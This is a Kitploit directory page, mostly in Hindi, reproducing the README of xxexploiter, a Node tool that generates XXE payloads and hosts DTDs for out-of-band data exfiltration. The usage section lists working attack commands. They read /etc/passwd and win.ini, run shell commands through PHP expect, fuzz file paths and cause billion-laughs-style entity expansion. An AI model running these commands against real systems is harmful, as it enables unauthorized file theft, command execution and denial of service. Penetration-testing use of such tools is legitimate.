Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
xxexploiter — XXE कमजोरियों का शोषण करने में मदद करने वाला उपकरण | Kitploit
उपकरण/GitHubGitHub/luisfontes19/xxexploiter
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंग
GitHubluisfontes19/xxexploiter

xxexploiter

XXE कमजोरियों का शोषण करने में मदद करने वाला उपकरण

रिपॉजिटरी देखें
615704 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

यह XML पेलोड उत्पन्न करता है, और आवश्यक DTD की सेवा या डेटा एक्सफिल्ट्रेशन के लिए स्वचालित रूप से एक सर्वर शुरू करता है।

स्थापना

root@kitploit:~
#install node and npm if you don't have it yet 
npm install -g xxexploiter

स्रोत से निर्माण और चलाना

यह एक साधारण Node एप्लिकेशन है जो TypeScript में लिखा गया है। तो आप इसे वैसे ही बना सकते हैं जैसे आप अन्य ऐप्स बनाते हैं:
(पहले node और npm स्थापित करें, यदि आपके पास नहीं हैं)

root@kitploit:~
npm install  
npm run build  
#you may need to npm install typescript -g in order for 'npm build' to succeed 

एप्लिकेशन चलाने के लिए आप तीन तरीकों में से एक का उपयोग कर सकते हैं:

root@kitploit:~
npm start [args]  
node dist/index.js [args]  
npm link #and now just call xxexploiter

या आप इसे अपने सिस्टम पर स्थापित कर सकते हैं:

root@kitploit:~
npm link

उपयोग

root@kitploit:~
Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

उदाहरण

सरल पेलोड निर्माण

asciicast

पेलोड भेजने के लिए अनुरोध स्वचालित करना

asciicast

स्वचालित अनुरोध के साथ OOB निष्कर्षण

asciicast

फ़ज़िंग

asciicast

कुछ नोट्स:

यदि आप OOB या CDATA मोड का उपयोग करना चुनते हैं, तो XXExploiter आवश्यक dtd उत्पन्न करेगा जिसे शामिल किया जाना है, और उन्हें होस्ट करने के लिए एक सर्वर शुरू करेगा। ध्यान रखें कि यदि आप इन विकल्पों का उपयोग करते हैं तो आपको सर्वर पता सेट करना चाहिए।

यदि आप XML के मुख्य भाग में सामग्री शामिल करते हैं तो ध्यान रखें कि XML प्रतिबंधित वर्ण जैसे '<' पार्सिंग को तोड़ सकते हैं, इसलिए CDATA या PHP के base64encode का उपयोग करना सुनिश्चित करें।

अधिकांश भाषाएँ एंटिटी विस्तार की संख्या, या विस्तारित सामग्री की कुल लंबाई को सीमित करती हैं, इसलिए सुनिश्चित करें कि आप पहले अपनी मशीन पर XEE का परीक्षण करें, लक्ष्य के समान शर्तों के साथ।

टूल डाउनलोड करें